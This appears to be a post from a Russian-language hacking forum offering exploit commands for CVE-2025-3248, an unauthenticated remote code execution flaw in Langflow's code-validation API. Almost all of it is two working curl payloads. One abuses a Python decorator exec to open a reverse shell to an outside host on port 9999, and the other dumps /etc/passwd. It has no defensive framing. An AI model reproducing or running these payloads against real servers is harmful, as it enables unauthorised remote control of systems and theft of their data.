• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Langflow AI - Unauthenticated Remote Code Execution CVE-2025-3248

pianoxltd

RAID-массив
Пользователь
Регистрация
24.09.2024
Сообщения
50
Реакции
19
Гарант сделки
3

Abusing Python Exec for Unauth RCE in Langflow AI​


Python reverse shell

:cool: :cool:


Код:
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n  pass"}'

cat /etc/passwd

Код:
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output([\\\"cat\\\", \\\"/etc/passwd\\\"]))\")\ndef foo():\n  pass"}'
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх